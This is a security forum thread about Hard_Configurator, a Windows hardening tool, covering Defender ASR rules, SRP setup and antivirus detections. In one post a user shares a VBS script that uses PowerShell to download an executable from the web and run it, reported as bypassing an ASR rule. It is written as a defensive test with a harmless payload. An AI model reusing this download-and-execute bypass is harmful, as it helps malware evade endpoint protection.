Hard_Configurator - Windows Hardening Configurator

Discussion in 'System Utilities' started by Andy Ful, Dec 10, 2016.

  1. Av Gurus

    Av Gurus Level 28
    Trusted AV Tester

    Sep 22, 2014
    1,722
    10,659
    Testing security programs
    Earth
    Windows 10
    I set all of this options:

    Clipboard12.jpg Clipboard11.jpg
     
  2. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    I examined your settings. There is one option I cannot fully understand: 0-tolerance cloud blocking level. I thought that it had to block all unknown executables, but that is not the case, when looking at your tests.
     
    ZeroDay and Av Gurus like this.
  3. Av Gurus

    Av Gurus Level 28
    Trusted AV Tester

    Sep 22, 2014
    1,722
    10,659
    Testing security programs
    Earth
    Windows 10
    I thought also, but it's not like that in RL.
     
    ZeroDay and Andy Ful like this.
  4. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    Here is the link to docs.microsoft.com article:
    Use Attack surface reduction rules to prevent malware infection
    It follows from it, that ASR applies to:
    • Windows 10, version 1709 (and later)
    • Microsoft Office 365
    • Microsoft Office 2016
    • Microsoft Office 2013
    • Microsoft Office 2010
    The bad thing is that also the ASR rule 'Impede JavaScript and VBScript to launch executables' seems not working outside Microsoft Office.
    After setting the ASR rules:
    Code:
    Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
    I can still run successfully eso.exe via the simple RunEso.vbs script:
    Code:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run("c:\z\eso.exe")
    WScript.Quit
     
  5. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,259
    13,534
    Utopia
    How can the average user of Hard Config keep notified about new versions?
    I am on v. 3.1.0.0
     
    AtlBo, Andy Ful and Sunshine-boy like this.
  6. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
  7. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,259
    13,534
    Utopia
    AtlBo, Andy Ful and Sunshine-boy like this.
  8. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    #328 Andy Ful, Dec 3, 2017
    Last edited: Dec 3, 2017
    In fact the ASR rule 'Impede JavaScript and VBScript to launch executables' has also another more appropriate description: 'Block JavaScript or VBScript from launching downloaded executable content'.
    .
    So, it cannot block the script from executing files that are already on the disk, but can block some script trojan downloaders. That feature works independently of Microsoft Office.
    The bad thing is that I managed to bypass this ASR rule using the VBS script trojan downloader:
    Code:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
    WScript.Sleep(10000)
    WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
    WScript.Quit
    The downloaded/executed file is a harmless SUMO lite installer from the developer site. The analogical script without using PowerShell is blocked by ASR (no file is downloaded).
    Poll - Who has already played with new W10 security features?
    :rolleyes:(n)
     
    AtlBo and ZeroDay like this.
  9. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    The problem is that Hard_Configurator do not look outside from the computer (no external connections). I was thinking about adding a <Check for updates button>. That option could check for the program new versions.:)
     
    AtlBo, ZeroDay, Daniel Keller and 3 others like this.
  10. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    I am working now on Hard_Configurator extension, the tool to configure Windows Defender on Windows 10 FCU home versions (ASR rules + exclusions). It contains the rules used by @Av Gurus (16 rules + ASR rules), but cannot be used on Windows Pro, because PowerShell set-MpPreference cmdlet used to apply those settings can be overridden by existent Defender Group Policy rules. I have to solve this issue, because this tool is far more convenient than using gpedit.msc .
     
  11. steel9

    steel9 Level 3

    Jun 23, 2017
    142
    398
    Sweden
    Windows 10
    F-Secure
    Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
     
    AtlBo likes this.
  12. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    #332 Andy Ful, Dec 5, 2017
    Last edited: Dec 5, 2017
    Here is the link:
    Hard_Configurator---old-versions/Hard_Configurator_3.1.0.0_sources.zip at master · AndyFul/Hard_Configurator---old-versions · GitHub
    The Hard_Configurator folder must be copied to Windows folder!!!. One can compile the executable manually using AutoIt - only the file Hard_Configurator.au3 has to be compiled, the rest is added during the compilation process.
    .
    The code is not properly commented and is not optimized. It also uses some opensource functions made by the members of AutoIt Forums , (Ascend4nt, Erik Pilsits, FredAI, Melba23, trancexx, Valuater).
     
    AtlBo, Daniel Keller, ZeroDay and 2 others like this.
  13. bribon77

    bribon77 Level 10

    Jul 6, 2017
    492
    3,399
    spain
    Windows 7
    Emsisoft
    #333 bribon77, Dec 9, 2017
    Last edited: Dec 9, 2017
    Hi, I installed Hard_Configurator. And I'm happy. It's a great tool.(y)
    I like this
    explorer_2017-12-09_13-44-45.png
     
  14. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    You are welcome. Post here any questions. I am ready to answer, if the help files are not sufficient.:)
     
  15. bribon77

    bribon77 Level 10

    Jul 6, 2017
    492
    3,399
    spain
    Windows 7
    Emsisoft
    Thanks for the moment. Runs fine. If I have any questions, I'll let you know. many thanks.:)
     
  16. Reldel1

    Reldel1 New Member

    Jun 12, 2017
    1
    2
    Melbourne, FL
    I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
     
    AtlBo and Sunshine-boy like this.
  17. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    The SRP part of Hard_Configurator will work, but you have reset SRP:
    1. Use gpedit.msc to remove SRP from GPO.
    2. If you configured SRP when not using Group Policies (SSRP or reg tweaks), then simply press <Recommended SRP> button in Hard_Configurator.
    The problem with other GPO settings is that they are refreshed in the Registry every day. This can overwrite the Hard_Configurator settings. Simply look at the Hard_Configurator settings after a day or two. If any setting will change its value, then it is the sign that you already activated this setting in GPO. If so, then it should be set to unconfigured state. If you will have any problem, just post here.:)
     
  18. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
    I changed some settings in group policy and they didn't reset your tweaks! but if you touch the SRP then everything goes wrong:D
     
    AtlBo, Andy Ful and bribon77 like this.
  19. steel9

    steel9 Level 3

    Jun 23, 2017
    142
    398
    Sweden
    Windows 10
    F-Secure
    The x86 installer was detected as malware by multiple scanners. I submitted false positive reports to some of them, but according to Avast it was not a false positive.

    "
    Hello,

    Thank you for reporting this.

    Our virus specialists have confirmed that this detection is indeed correct due to lack of compliance with our clean software policy.

    You can find further details in the following article: Avast Clean Guidelines.


    With regards,

    Avast Customer Care
    "

    I asked them why, but they haven't responded yet
     
    AtlBo and Andy Ful like this.
  20. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
    This is because avast sucks! I remember once avast detects pot player updates as malware!just remove that av and install another one:D
     
Loading...